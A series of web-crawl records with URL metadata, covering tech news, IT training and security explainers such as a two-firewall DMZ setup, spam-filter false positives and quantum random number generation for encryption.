If a new bee needs more components or features, it's only necessary to laser-cut a few additional layers of Kevlar, carbon fiber, polymers, ceramics or any other material, then slip them into the correct order in the stack of layered, pre-cut parts. The design, production and assembly of components is so precise that the lab literally cannot measure how tight the tolerances on its final product are. "The alignment is now better than we can currently measure," Sreetharan said. "I've verified it to better than 5 microns everywhere, and we've gone from a 15% yield to—well, I don't think I've ever had a failure."

Though the process is specific to the RoboBee, it and its (literally) unmeasurably fine tolerances for component manufacture can be applied to almost any other tiny machine as well. The full process will be published in the March issue of the Journal of Micromechanics and Microengineering. The U.S. Army Research Laboratory and the National Science Foundation both contributed grant money to fund the RoboBee program, so they'd get first dibs on any end product. The Harvard Office of Technology Development is also looking for a way to commercialize the RoboBee.

So it's possible that within a relatively few years you'll be able to buy a flat disk packaged in paper like a book of stamps from a RoboVending machine and pull up on a string to unfold an internally powered, fully functioning remote-controlled flying robot. Who cares if there would be an actual, practical use for it? Get one to look under the couch for the remote or harass the cat. If they're as cheap to make and distribute as they should be using this approach, it would be easy to justify buying one just for its cool-gadget rating (10+) rather than its practicality (rating: 3ish).

My only hesitation is from the horror-movie images that spring to mind when Wood and Sreetharan talk about experimenting with "swarms" of RoboBees. But as long as Harvard is sure the RoboBees couldn't find nourishment or energy by, say, swarming over and devouring their owners, I'm sure I could be convinced to give the bees a try.

Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:b9fa63c9-8aaa-4112-a951-e2b6fdd28250>
CC-MAIN-2017-04
http://www.itworld.com/article/2729550/mobile/flying-robot-made-cheap--easy-enough-to-buy-from-vending-machines.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00241-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957514
1,346
3.765625
4
With regard to routing, which of these is a way to tell a router about a network to which it is not directly connected?

- Default Gateway
- Dynamic Routing Protocol
- Default Route

A router can be configured to run a dynamic routing protocol so that it can learn from other routers about networks to which it is not directly connected.
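For context, here is a hedged IOS-style configuration sketch; the addresses, wildcard mask and process number are invented for illustration and are not part of the exam question:

```
! One static default route: a single manually configured entry that
! matches any destination the router has no more specific route for.
ip route 0.0.0.0 0.0.0.0 203.0.113.1

! A dynamic routing protocol (OSPF in this sketch): the router advertises
! its own networks and automatically learns remote networks from neighbors.
router ospf 1
 network 10.0.0.0 0.255.255.255 area 0
```

The static entry only tells the router where to forward unknown traffic; running a routing protocol is what lets it learn, route by route, about networks it is not directly connected to.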
<urn:uuid:7b5db2b3-f595-41c3-9262-21bf6b3e57c3>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2013/01/07/ccna-exam-prep-question-of-the-week-21/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00359-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933966
70
2.640625
3
When thinking about workflow and business process management, one of the major topics involved is Change Control.

What Is Change Control?

"Change Control is a systematic approach to managing all changes made to a product or a system. The purpose is to ensure that no unnecessary changes are made, that all changes are documented, that services are not unnecessarily disrupted and that resources are used efficiently."

While the concept of change control may seem simple enough, many businesses struggle with how to implement change efficiently. Many documents have been written and solutions created to control the change process. As part of the ITIL best practices framework, there's even an entire discipline devoted to change control, while solution providers have developed suites of product offerings designed specifically to control the change process. All cover the following basics:

• Define the change
• Analyze the impact of the change
• Authorize the change
• Report on the results of the change

From these four steps, change control processes can be defined and built for all operational areas of your business. Because each business area serves a different purpose, the basic process itself must be flexible to accommodate the various areas. This may include different steps, based on approval levels or impacts of the change.
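As a rough illustration only (the states, field names and transitions below are invented, not taken from ITIL or any particular product), those four steps can be modeled as a simple record lifecycle:

```python
from dataclasses import dataclass, field

# The four basic steps, in order.
STEPS = ["defined", "analyzed", "authorized", "reported"]

@dataclass
class ChangeRequest:
    title: str
    state: str = "defined"
    history: list = field(default_factory=list)

    def advance(self, note: str):
        """Move to the next step, documenting the transition."""
        self.history.append((self.state, note))
        self.state = STEPS[STEPS.index(self.state) + 1]  # errors past "reported"

cr = ChangeRequest("Rotate web server TLS certificates")
cr.advance("Impact: brief checkout downtime; billing team affected")  # -> analyzed
cr.advance("Approved by change advisory board")                       # -> authorized
cr.advance("Completed 02:00-02:10 UTC; no service interruption")      # -> reported
```

Real change control adds branching, approval levels and rollback, but every variation still reduces to defining, analyzing, authorizing and reporting the change.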
Areas Impacted by Change Control

Here are several areas that change control may impact:

1. IT Change

Change control is most frequently identified with IT environments, which receive the most focus and the widest range of articles and software. It covers a broad range of processes, including user access, hardware or server changes, and service implementation. Andy Hogg in ComputerWeekly.com says, "Within the IT world, change is inevitable. We have the constant release of security patches, hot fixes, service packs, new versions, changes to code, hardware replacements, configuration changes, modifications to reference data – the list goes on." He further states that "70-80% of service interruptions are caused by changes being made," or, rephrased, "70-80% of the pain is caused by changes." The point Hogg makes is that change is often a painful process because things can get hairy. Having a change management process in place is critical to ensure minimal risk when making IT changes.

2. Design Change

The change control process serves the customer, whether internal or external to your company. For example, a manufacturer making changes to a product based on the needs of the customer requires a change control process that ensures proper reviews by engineering, safety, and operations teams before the customer approves a final design. Another company may not need a change control process for a customer but, instead, may need a document management system that ensures internal reviews by the legal and standards teams before final release.

3. Operations Change

Businesses continually change the way they operate and handle their business processes, searching for efficiencies that make them more cost-effective. Changes to processes need to be reviewed and authorized to make sure they don't impact operations in other areas. For example, a company that needs to make rate changes on its website may need those changes reviewed by multiple teams to find out where problems might occur and who would be affected. Additionally, when process changes impact multiple departments, the heads of those departments may need to grant approval before moving forward.

4. Software Change

Companies creating software typically go through some sort of change control process where enhancements are requested, reviewed, and analyzed before being approved, then developed and tested before release. The more complex the enhancement request, the greater the potential impact on the product. Software can be helpful when supporting customers, so that every glitch is reported and follows the appropriate change control process. Every company handles the steps differently, depending on its specific needs.

Flexibility Is Key

Change control is a basic component of business operations and cannot be limited to one area within a business. Any software used to track your change control should be flexible enough to cover these multiple areas with easy and simple tweaks that don't require detailed programming modifications. If software has a specific change control function, can it be configured for use outside of IT, or is it locked down specifically to that area? Does it handle everything from simple checklists to branching workflow processes, depending on the needs of the business area? Can it be configured so you only need to use one tool across your entire company?

How Issuetrak Can Help with Change Control

Issuetrak's flexible configuration allows for both simple and complex processes. By allowing you to determine the exact steps specific to your area of change, including any required branching, you can use it across any business area to meet your various change control needs. Issuetrak doesn't lock you into steps that may not apply, and it also allows you to create multiple processes, depending on which business area needs to implement change control. Whether your change control deals with Help Desk issues, design changes, operational changes, software enhancements or bug fixes, or something else, Issuetrak gives you latitude to define your own process and to make it as detailed as you'd like to ensure change requests are properly reviewed and approved and then efficiently implemented.
<urn:uuid:6c7e8273-af5e-43aa-8d7c-3e7e73de1940>
CC-MAIN-2017-04
https://www.issuetrak.com/change-control-and-issuetrak/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93379
1,066
2.53125
3
3.1.9 Is the RSA cryptosystem currently in use? The RSA system is currently used in a wide variety of products, platforms, and industries around the world. It is found in many commercial software products and is planned to be in many more. The RSA algorithm is built into current operating systems by Microsoft, Apple, Sun, and Novell. In hardware, the RSA algorithm can be found in secure telephones, on Ethernet network cards, and on smart cards. In addition, the algorithm is incorporated into all of the major protocols for secure Internet communications, including S/MIME (see Question 5.1.1), SSL (see Question 5.1.2), and S/WAN (see Question 5.1.3). It is also used internally in many institutions, including branches of the U.S. government, major corporations, national laboratories, and universities. At the time of this publication, technology using the RSA algorithm is licensed by over 700 companies. The estimated installed base of RSA BSAFE encryption technologies is around 500 million. The majority of these implementations include use of the RSA algorithm, making it by far the most widely used public-key cryptosystem in the world. This figure is expected to grow rapidly as the Internet and the World Wide Web expand. For a list of RSA algorithm licensees, see http://www.rsasecurity.com/
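To make that concrete, here is a minimal sketch of how an application might use the RSA algorithm through a modern library; this example uses Python's third-party cryptography package (not any specific product named above), and the key size and message are chosen purely for illustration:

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# Generate an RSA key pair; 2048 bits is a common modern choice.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Encrypt with the public key; only the private key holder can decrypt.
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
ciphertext = public_key.encrypt(b"short symmetric session key", oaep)
assert private_key.decrypt(ciphertext, oaep) == b"short symmetric session key"
```

In practice, as in the S/MIME and SSL protocols mentioned above, RSA is typically used this way to protect a short symmetric session key rather than to encrypt bulk data.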
<urn:uuid:99086c1f-6ba4-47c5-bbc0-f96d89bc59c6>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/rsa-cryptosystem-currently-in-use.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00387-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938379
288
3.25
3
Learn UNIX concepts, terms, and commands in this powerful hands-on course that covers all flavors of UNIX.

Get a foundational overview of UNIX operating system commands and utilities in this course. You will learn to navigate the UNIX file systems and to work with files, directories, and permissions. You will learn to manage UNIX processes and use regular expressions to create powerful search strings. You also will learn to create advanced shell scripts using shell built-ins and conditionals, and you will learn powerful commands used to perform advanced text processing.

Hands-on labs are run in a real-world UNIX environment, structured to let you learn by doing and developed to simulate real-world situations. You will build your UNIX knowledge and command skills in a clear and concise manner. Working in a controlled UNIX classroom environment with an expert instructor, you will learn UNIX concepts and commands, and you will receive professional tips and techniques that will help you build your UNIX skills and confidence.
<urn:uuid:1d6e781b-da98-460c-b063-915f3fcee859>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/course/116049/unix-fundamentals/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00021-ip-10-171-10-70.ec2.internal.warc.gz
en
0.888533
213
2.890625
3
Eventually, if you get interested enough in information security, you are going to wonder what a DMZ is and why you should or should not have one. DMZ is an acronym that stands for De-Militarized Zone, and in the 'real' world it is the location between two hostile entities such as North and South Korea. In the security community, however, it is a separate, untrusted network where boxes serving public services should be placed. It's a buffer zone between a completely untrusted network (like the Internet) and a relatively trusted network (like your private LAN). The primary reason for implementing a DMZ is to keep your public and private assets separated, so that a compromise in the public area does not automatically result in a compromise of your private assets as well.

There are two main ways to implement a DMZ for personal use. The first is using three or more NICs, as follows:

- 1 NIC for the WAN (your gateway to the Internet; everything comes and goes through this NIC)
- 1 NIC for the LAN (behind this NIC is where you have all your private assets, e.g. file servers, domain controllers, questionable material collections, etc.)
- 1 NIC for the DMZ (this is where you put any machine that you want to allow people on the Internet to connect to, e.g. web servers, FTP servers, mail servers, game servers, etc.)

This is one method of creating a DMZ, but it is not the preferred method. This configuration places the security of both your DMZ and your LAN in a single system. If the machine that has all three of those NICs in it is compromised, so are your DMZ and your private network. Basically, you are allowing the Internet to 'touch' the very same machine that determines how secure your internal LAN is, and while the risk is pretty low, it's not the ideal situation.

The better way to do this is with three separate networks - the Internet, your DMZ, and your LAN. This is accomplished by using two firewalls: one on the border of your WAN (which usually handles your connection), and one on the border of your internal network. Let's say that you have a broadband router (like Linksys, Netgear, D-Link, or whatever) and an open-source software firewall (like Astaro, M0n0wall, etc.). What you do is put your router on your border (right behind your modem), and connect the LAN side of that router to a hub or switch. To that hub or switch (your DMZ hub/switch) you use one of the ports to connect your bastion host/public server(s). This machine (or machines) runs the services that you want people to be able to connect to from the outside. This may be a web site, an FTP server, or a multiplayer game like WCIII or Counter-Strike. You want this machine to be hardened (preferably very well), meaning that it is completely patched and is running as few services as possible. As a general rule, though, you want anything put in the DMZ to be resistant to attacks from the Internet, since public access is the reason you are putting it out there in the first place. How to harden the servers you put in your DMZ is outside the scope of this article, but suffice it to say that you want to lock them down: no services running that don't need to be, all updates applied, etc.

Now, to that same switch (the DMZ switch) you are going to attach another network cable that goes to your internal firewall (your Linux/BSD firewall). It is important to note that you want your strongest firewall closest to your LAN; or, putting it another way, you want your weakest firewall on your border.
This may seem counterintuitive, but it's usually the right way to do things. Basically, you want the most powerful and most configurable firewall protecting your LAN, not your DMZ. As for your internal firewall, it's going to have two NICs in it: one for the DMZ side and one for the private LAN side. Connect the cable coming from your DMZ switch to the DMZ side of the internal firewall (the external interface), and on the other side of the firewall (the private LAN side) connect a cable to another hub/switch that all of your LAN computers will connect to. If that was confusing, think of it this way:

Internet -> Modem
Modem -> Router
Router -> DMZ Switch
DMZ Switch -> WEB/FTP/Game Server
DMZ Switch -> Firewall External NIC
Firewall Internal NIC -> LAN Switch
LAN Switch -> LAN Systems

What This Gives Us

So let's take a look at the security offered by this setup. At the border you have NAT translation going on that passes only the ports the public needs in order to use the servers in your DMZ. Let's say you are running a web server, an FTP server, and a game server for a game called FooAttack. On your border router/firewall you pass ports 80, 21, and 5347 (the FooAttack server port). All other attempted connections to your external IP address drop dead at your border; only those three ports are allowed through because of NAT. The nature of NAT dictates that only return traffic (traffic that is part of a connection that originated from the inside of the NAT device) will be allowed back into the NAT'd network. This side effect of NAT, while not its original or main goal, is a fairly powerful security feature. If your border device supports filtering of any sort in addition to NAT, then you can further lock down your network by restricting who can and cannot connect to the hosts in your DMZ.

That first border layer, while good, is just one piece of the overall DMZ security posture. The real beauty of this setup lies in what happens if someone *does* get a hold of a machine in your DMZ. Imagine that you have the setup I laid out above, but unbeknownst to you there is a major vulnerability in the web server you are running. So here you are offering web content to the entire Internet, and someone runs the proper exploit against your machine and roots it. Now what?

Now nothing. Your second and more powerful firewall (the one that they are still *outside* of) does not pass *any* traffic from the DMZ inside to the LAN. (In fact, you should have it where it won't even respond to ICMP from DMZ machines, so the odds are they won't even know it's there.) And now, rather than being able to bounce around on your juicy internal LAN like they planned, they are stuck in the middle of a completely untrusted and unprivileged network that doesn't have anything on it other than what you intended for public viewing anyway. This is a DMZ. Even if they did know where the internal firewall was, it wouldn't even entertain the notion of passing connection attempts from the DMZ. This internal layer of protection is NAT'd just like your first layer, only there are no ports being passed inside like from the Internet to the DMZ. Your second firewall actually has no idea what to do with packets that are designed to initiate new connections with it, so it just drops them. The only traffic that is going to make it through that firewall is traffic that you specifically request be allowed through by talking to a machine outside of that firewall, e.g. when you go to /., it will allow the web content to come *back* to you so you can view the page, but if someone tries to initiate a new connection to you, they get dropped. Both NAT and SPI (stateful packet inspection) afford this protection to you, each in different ways.
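To make the internal firewall's stance concrete, here is a hedged sketch in Linux iptables syntax; the interface names are invented (eth0 facing the DMZ, eth1 facing the LAN), and a real ruleset would need more than this (loopback, logging, management access):

```
iptables -P FORWARD DROP                         # default policy: pass nothing
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT    # LAN may initiate outbound
iptables -A FORWARD -i eth0 -o eth1 \
    -m state --state ESTABLISHED,RELATED -j ACCEPT   # only replies come back in
```

A packet from a compromised DMZ box trying to open a new connection into the LAN matches neither ACCEPT rule, so the default DROP policy silently discards it - exactly the "now nothing" behavior described above.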
So, to sum it all up, imagine someone is scanning around looking for web daemons to tear up and they find yours. Many inexperienced attackers would assume that you are running something on your public IP address, as if your main workstation were sitting right on the Internet running a web daemon. So, they connect to it, get a web page, and then scurry to dig up their favorite HTTP exploit tool that someone else wrote. What they don't know is that they are actually connecting to a private IP in your DMZ. It has no 'real' IP address as far as the Internet is concerned. If you hadn't passed that port at the border device, they wouldn't have seen anything at all with their scan.

But let's say they do see your web daemon because you are passing port 80 through to your DMZ host running a web site, and it turns out it has a vulnerability in it. They run their exploit and get root on your box. This causes them tremendous joy, and they hurry to tell all their buddies because they think they're Alan Cox. The thing is, they have little to celebrate. All they have is a barebones server with nothing of value on it: no vital info, no browsing history, no personal information, nothing. In fact, all you have on there is content that you wanted the public to see in the first place (which is also safely backed up on your internal network and/or removable media). So, they have root on the machine and ping around in your DMZ and soon find that there isn't much there. If they are smart they will do an ifconfig (or ipconfig if you swing that way) and find out they are on a private subnet, but this gains them nothing. The odds are that from there they'll either load some trash onto your system or try to destroy it. Either way, it doesn't matter. The moment you detect what has happened (Tripwire, Snort, whatever...) you simply pull the plug, reinstall the box, and restore the backup. Within a few minutes you have a brand-new system ready to go back online, and at no point during the process was your private LAN in danger. This is the benefit of running a DMZ.

Hopefully this basic description of the general concept has been helpful to someone. If you have any questions about DMZs or any other security topics, feel free to contact me.

[Originally published in March of 2003 at NewOrder]
<urn:uuid:2a459bd0-0e23-424d-b5fd-71007a178e5d>
CC-MAIN-2017-04
https://danielmiessler.com/study/dmz/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00507-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951693
2,215
2.953125
3
U.S. Students Rank Lower Than Ever in Science and Math

The PISA (Program for International Student Assessment) results released Dec. 4, which compare the scores of 15-year-old students in the United States with those of their international peers, are especially disheartening this year. The average combined science literacy scale score for U.S. students was lower than the OECD (Organization for Economic Cooperation and Development, an intergovernmental agency of 30 member countries and the sponsor of the report) average, according to the latest PISA results. U.S. students fell to 25th place in math and 21st place in science. The United States was joined by Spain and Italy among the 32 countries that were classified as below the OECD average.

"In today's technology-based societies, understanding fundamental scientific concepts and theories and the ability to structure and solve scientific problems are more important than ever," the report said.

Finnish 15-year-olds took the top spot in science knowledge, South Korea came in first in reading, and students from Chinese Taipei were the smartest at math.
<urn:uuid:d6ba2a2a-980d-4559-b743-b588de87caa7>
CC-MAIN-2017-04
http://www.eweek.com/careers/us-students-rank-lower-than-ever-in-science-and-math.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00139-ip-10-171-10-70.ec2.internal.warc.gz
en
0.968114
225
2.6875
3
Primer: Spam Filtering: The False Positive
By David F. Carr | Posted 2003-12-01

Spam-blocking applications can screen out legitimate e-mail messages. A look at what can trip up your company: a false positive is a legitimate e-mail that is not delivered because a spam filter incorrectly identifies it as junk mail.

Why is it a problem? E-mail is an essential business tool, and there's a cost when it doesn't work as intended. For example, your company might use an application to generate order confirmations to customers. But a false positive can sidetrack a legitimate order.

How does it happen? Messages are red-flagged by the spam-blocking applications that companies and Internet service providers use to screen activity on incoming e-mail servers. A filter typically scans and scores each e-mail, blocking delivery of whatever it deems spam. A false positive results when a sender unwittingly includes enough of these red flags in a legitimate e-mail for it to be deemed spam.

How are spam scores determined? Spam filters base scores on known spam techniques. Most filters work by parsing the headers, content and technical characteristics of e-mail, looking for specific indicators. One or two indicators alone don't usually earn a spam label, but if the filter identifies enough suspicious patterns (the presence of Hypertext Markup Language (HTML) or a suspicious server origin, say), the spam score is met and the e-mail is rejected. Anti-spam systems also keep blacklists of known spammers, as well as lists of approved senders. Most anti-spam systems keep their rules secret to prevent spammers from targeting them.

What characteristics cause problems? Suppose you send a monthly HTML e-mail that contains an image tag pointing to a graphic on your Web server. A spam filter would likely flag it because it contains HTML and links to an image, making it look a lot like a common pornography advertisement. Other content indicators include ALL CAPS text, red font tags, huckster language like "pure profit" and even the word "remove." Spammers often misuse the seemingly benign "remove me from this list" offer to verify e-mail addresses and subject them to more spam. Spam-blockers also check technical characteristics, on the theory that spammers typically have sloppy coding habits. A common technical red flag is a "From" address that doesn't match the header automatically added by the e-mail server of origin. That's a problem for a company that uses a third-party service to send e-mail that appears to come directly from its own domain. Witness Tumbleweed Communications, which makes an anti-spam application and was chagrined to find that its product filtered out Web conference invitations it had sent to its own clients using the WebEx service.

I'm not selling Viagra. Why should I worry? Because spam techniques keep changing. An application that auto-generates e-mail can work fine one day and be flooded with return mail the next. Your staff needs to stay on top of spam-blocking updates and guard against false positives. The very fact that your company uses an automated Web script to generate e-mail may now be a red flag on your customers' spam filters.
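As a toy illustration of the scoring model described above (the indicators, weights and threshold here are invented; real filters keep theirs secret):

```python
# Each suspicious pattern contributes a weight; one or two alone stay under
# the threshold, but enough of them together earn the spam label.
INDICATORS = {
    "contains_html": 1.2,
    "all_caps_text": 1.5,
    "huckster_phrase": 2.0,       # e.g., "pure profit"
    "word_remove": 1.8,
    "from_header_mismatch": 2.6,  # e.g., mail sent via a third-party service
}
THRESHOLD = 5.0

def spam_score(tripped_flags):
    return sum(INDICATORS[flag] for flag in tripped_flags)

# A legitimate HTML newsletter with an unsubscribe line, sent through an
# outside mailing service, can trip enough rules to become a false positive:
newsletter = ["contains_html", "word_remove", "from_header_mismatch"]
score = spam_score(newsletter)  # 5.6
print("rejected as spam" if score >= THRESHOLD else "delivered")
```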
<urn:uuid:6b536d55-b444-40ce-aee9-b646a93c5f92>
CC-MAIN-2017-04
http://www.baselinemag.com/it-management/Primer-Spam-Filtering-The-False-Positive
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00498-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92847
675
2.796875
3
IBM Research Shows Off Two New Watson-Related Medical Projects

Moreover, as medical experts interact with WatsonPaths, the system will use machine learning to improve and scale the ingestion of medical information. WatsonPaths incorporates feedback from the physician, who can drill down into the medical text to decide whether certain chains of evidence are more important, provide additional insights and information, and weigh which paths of inference lead to the strongest conclusions. Through this collaboration loop, WatsonPaths compares its actions with those of the medical expert so the system can get "smarter."

WatsonPaths, when ready, will be available to Cleveland Clinic faculty and students as part of their problem-based learning curriculum and in clinical lab simulations, IBM said.

Meanwhile, IBM and Cleveland Clinic are using Watson EMR Assistant to explore how to navigate and process electronic medical records to unlock hidden insights within the data, with the goal of helping physicians make more informed and accurate decisions about patient care. Historically, the potential of EMRs has not been realized due to discrepancies in how the data is recorded, collected and organized across health care systems and organizations. The massive amount of health data within EMRs presents tremendous value for transforming clinical decision making, but it can also be difficult to absorb. For example, analyzing a single patient's EMR can be the equivalent of going through up to 100MB of structured and unstructured data in the form of plain text that can span a lifetime of clinical notes, lab results and medication history, IBM said.

Company officials said the goal of the Watson EMR Assistant research project is to develop technologies that will be able to collate key details in the past medical history and present to the physician a problem list of clinical concerns that may require care and treatment, highlight key lab results and medications that correlate with the problem list, and classify important events throughout the patient's care within a chronological timeline.

IBM and Cleveland Clinic are discussing the role of Watson in the future of medicine at the Cleveland Clinic Medical Innovation Summit, being held October 14-16 in Cleveland.

Watson's natural language expertise allows it to process an EMR with a deep semantic understanding of the content, helping medical practitioners quickly and efficiently sift through massive amounts of complex and disparate data and better make sense of it all. The system's natural language processing and machine learning technologies are being applied to begin analyzing whole EMRs, with the goal of surfacing information and relationships within the data in a visualization tool that may be useful to a medical practitioner, IBM said.
<urn:uuid:7e68753e-26de-4181-b493-c8198ff3e595>
CC-MAIN-2017-04
http://www.eweek.com/database/ibm-research-shows-off-two-new-watson-related-medical-projects-2.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00406-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93215
525
2.75
3
Truly Random Number Generator Promises Stronger Encryption Across All Devices, Cloud

So long, pseudo-random number generators. Quantum mechanics brought us true randomness to power our crypto algorithms, and it's strengthening encryption in the cloud, the datacenter, and the Internet of Things.

SAN FRANCISCO, RSA Conference -- In light of yet another SSL vulnerability this week, any improvements to the underpinnings of encryption would be welcome. One weakness of encryption algorithms -- one that simply increasing key length from 128-bit to 256-bit can't solve -- is that they are based on pseudo-random number generators, not truly random number generators. Whitewood Encryption Systems, which launched in summer 2015, is changing that by using quantum mechanics. It generates truly random numbers by harnessing the entropy (randomness, or disorder) of nature, which is far more random than any of the sources computing systems currently mine for entropy.

Two problems with old entropy collection

Entropy is collected at the hardware level, typically from actions like keystrokes and mouse movements. There are two troubles here.

One: keystrokes and mouse movements don't create enough entropy. In a Linux kernel, the entropy is used to create random characters that feed two special files: /dev/random and /dev/urandom. As Richard Moulds, Whitewood's vice-president of business development and strategy, describes it, /dev/random is the good drinking water -- the true random numbers -- while /dev/urandom may be fine for industrial uses, but you wouldn't want to drink it. If the two were faucets, the usual amount of entropy would produce a steady flow of /dev/urandom, but only a few drips of the delicious /dev/random. So when an application -- even a cryptographic application -- calls for a random number, it might get one of those low-quality urandom ones.
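For reference, this is what tapping those two kernel pools looks like from an application; a rough sketch, assuming a Linux system (note that kernels from 5.6 onward reworked /dev/random so it no longer blocks once the pool is initialized):

```python
import os

# The "industrial water": non-blocking, always available.
fast_bytes = os.urandom(32)

# The "drinking water": on older kernels this read can block until the
# kernel believes it has gathered enough fresh entropy.
with open("/dev/random", "rb") as pool:
    strong_bytes = pool.read(32)

print(fast_bytes.hex())
print(strong_bytes.hex())
```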
Two: since entropy is generated from hardware, every layer of abstraction from the hardware has reduced access to entropy -- and that's troubling for anyone who uses virtualization. "One bad reason to do virtualization," says Moulds, "is it's a firewall for entropy. In the virtual world, there ain't no randomness."

The product Whitewood launched with in August, the Entropy Engine, addresses the first problem. It turns the drip of drinking water into a steady flow. The natural world has light and sound to draw entropy from, but certain environments aren't particularly changeable -- a datacenter, for example, is usually just full of white noise and immobile machinery -- so it's not a great source of randomness. So what Whitewood does is put a quantum optical field right inside the server and capture the randomness of the photons' naturally unpredictable behavior. (Photons are naturally prone to bunching up, unbunching, then bunching up again, causing the optical field to dim, brighten, and flicker in a completely random way.)

One of the products Whitewood launched at RSA this week, NetRandom, addresses the second problem. As Raymond Newell, research scientist at Los Alamos National Laboratory and contributor to Whitewood's creation, explains, "We take the randomness we create and spread it across the network." Before, the Entropy Engine only worked on the local device. With NetRandom, Whitewood can feed randomness through the network and strengthen the encryption used by virtual machines, cloud instances, clients, servers, and embedded systems in Internet of Things devices. "One of them could support tens of thousands of virtual machines," says Newell.

Any application that uses cryptography can benefit, without needing any modifications and without any help from cloud service providers or IoT device manufacturers. Newell believes this will be a boon for security on industrial control systems and other embedded systems that are expected to last 10 to 20 years with minimal support. "One of the reasons we like quantum mechanics is because we're confident it's going to keep up," he says.

Whitewood also announced a partnership with wolfSSL, a company that sells stripped-down crypto toolkits for embedded systems that don't run full-blown operating systems -- like ATMs and IoT devices. The partnership will allow wolfSSL to provide that stronger encryption to its customers. Whitewood also announced an integration with Cryptsoft, an OEM provider of a key management integration protocol. The integration, says Newell, "allows to attest to the origin of the keys," which improves key management and could further empower digital signatures.

Find out more about security threats at Interop 2016, May 2-6, at the Mandalay Bay Convention Center, Las Vegas. Register today and receive an early bird discount of $200.

Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior to that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad ...
<urn:uuid:94866f92-e2a0-4526-9793-b06d8f1aa818>
CC-MAIN-2017-04
http://www.darkreading.com/endpoint/truly-random-number-generator-promises-stronger-encryption-across-all-devices-cloud/d/d-id/1324566?_mc=RSS_DR_EDT
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00554-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923305
1,042
2.984375
3
The Harvard Medical School publication, Focus, has an intriguing feature article, which describes a cutting-edge neuroscience advance: brain mapping. Researchers at Harvard Medical School's Department of Neurobiology say they've figured out a technique for crawling through the connections in the brain much like the way a computer algorithm crawls through network connections, like those in popular online apps such as Google and Facebook.

This is no easy task. Compared to computer circuits, with their fairly straightforward design, the brain's neural system is a tangled mess. But if that mess could be unraveled, the applications are "too numerous to list," according to Clay Reid, HMS professor of neurobiology and senior author on a paper in the March 10 edition of Nature, which details the findings.

Reid's lab has been studying the cerebral cortex for some years, and they have had some success in isolating the activities of individual neurons. For example, they are able to observe them fire in response to external stimuli. But they have not yet been able to get inside a single cortical circuit and "probe the architecture of its wiring." The article explains that just one of these circuits contains between 10,000 and 100,000 neurons, and each neuron makes about 10,000 interconnections, which means a single circuit can contain more than one billion connections.

Determined to figure out not only what the circuit does, but how it does it, Reid's team employed a two-part approach. First, they developed an imaging technique, which they used to detail the vision processing center of a mouse brain. Advanced microscopy tools enabled them to view the neurons at nanometer-level resolution. After they'd recorded more than 3 million such high-resolution images, the data was sent to the Pittsburgh Supercomputing Center at Carnegie Mellon University, where it was reconstructed into 3D images.

The second stage of the project was even more challenging: unraveling the mass of neurons. For this, the team selected 10 individual neurons for mapping. By carefully tracing each neuron, they were able to create a partial wiring diagram. A related video shows the wiring diagram. It also includes side-by-side videos: on the left is the movie shown to the mouse; on the right is the recording of the visual neurons. While not a perfect match, the similarity is evident.

The next step for the researchers is to scale up the system to handle larger data sets. Possible future applications sound like the stuff of science fiction. Reid believes that in as little as ten years, it could be possible to use the imaging technique to record the activity of thousands of neurons in a living brain, stating: "In a visual circuit, we'll interpret the data to reconstruct what an animal actually sees. By that time, with the anatomical imaging, we'll also know how it's all wired together."
<urn:uuid:43e80cbb-ff0c-4f2f-8043-f031487a3fc6>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/03/09/harvard_researchers_map_brain_circuitry/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00278-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947662
602
3.75
4
This document is a guide to setting up an IP-Surveillance system in a small- to medium-sized security installation. It provides an overview of network video's functionalities and benefits, and outlines considerations and recommendations for implementing such a system.

1. Introduction to an IP-Surveillance system

This chapter provides an overview of what is involved in an IP-Surveillance system, the benefits of network video, the importance of defining your surveillance application and legal considerations to take into account when setting up an IP-Surveillance system in your area.

1.1 What is IP-Surveillance?

